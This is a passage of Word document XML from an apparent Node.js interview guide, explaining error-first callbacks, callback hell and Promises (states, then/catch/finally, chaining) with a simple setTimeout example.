          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error-first callbacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are common in Node.js to handle potential errors in asynchronous operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CD5C8F" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> can occur with deeply nested callbacks, making code hard to read. This can be mitigated with techniques like promises, async/await, or control flow libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390004B8" w14:textId="77777777" w:rsidR="00BC18A1" w:rsidRPr="00DA2F32" w:rsidRDefault="00BC18A1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEDC41D"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5" w:name="_Toc178383188"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q5. What is a Promise in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="503FBCF3" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">In Node.js, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an object that represents the eventual completion (or failure) of an asynchronous operation and its resulting value. Promises provide a more powerful and flexible way to handle asynchronous operations than traditional callbacks, allowing for easier chaining of operations and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384091EA" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202A9D78" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>States</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7C7CF" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pending</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The initial state. The operation has not completed yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9010D" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fulfilled</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The operation completed successfully, and the promise now has a resulting value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA3A0D" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rejected</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The operation failed, and the promise now has a reason for the failure (typically an error object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1AE89" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C17EE1" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>then(onFulfilled, onRejected)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Attaches callbacks for when the promise is fulfilled or rejected. You can chain multiple then calls to handle successive asynchronous operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D7805" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>catch(onRejected)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Attaches a callback for only when the promise is rejected, useful for error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D624270" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>finally(onFinally)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Attaches a callback that will be executed regardless of whether the promise was fulfilled or rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9BAEBC" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B3949" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="648"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promises can be chained together to handle a sequence of asynchronous operations. Each then returns a new promise, allowing for the results of one operation to be passed to the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021A14D" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Creating and Using a Promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6535E382" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Basic Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65D894" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here’s an example of a promise that simulates an asynchronous task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62D1CB"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myPromise = new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D173E32"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success = true; // Simulating success or failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBA021F"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DF01FC7"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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFD7D4"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(success) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2507C53F"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resolve('Operation was successful!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3626C493"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08500835"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reject('Operation failed.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015793B4"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7CA0795"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2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C919288"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37AF419D"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974E9DE"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myPromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753CCE93"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.then(result =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CDD0F1"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console.log(result); // This runs if the promise is resolved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD58AFC"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D41D2CA"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.catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61408924"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console.error(error); // This runs if the promise is rejected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA0A5D"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ECC54EB" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2B1FB" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creating a Promise</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The new Promise constructor takes a function (the "executor") that has two arguments: resolve and reject. You call resolve when the operation is successful and reject when it fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2D8A1" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simulating Asynchronous Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In this example, setTimeout is used to simulate an asynchronous operation that either resolves or rejects the promise after 2 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CD684A" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling Fulfillment or Rejection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026A385" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>then(result =&gt; {...}): Executes the callback if the promise is fulfilled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BE77A" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>catch(error =&gt; {...}): Executes the callback if the promise is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC1C12" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Chaining Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5DB5D4" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>One of the main advantages of promises over callbacks is the ability to chain them. This is especially useful when you need to perform a series of asynchronous operations where each one depends on the result of the previous one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15774E" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Promise Chaining</w:t>
      </w:r>
    </w:p>
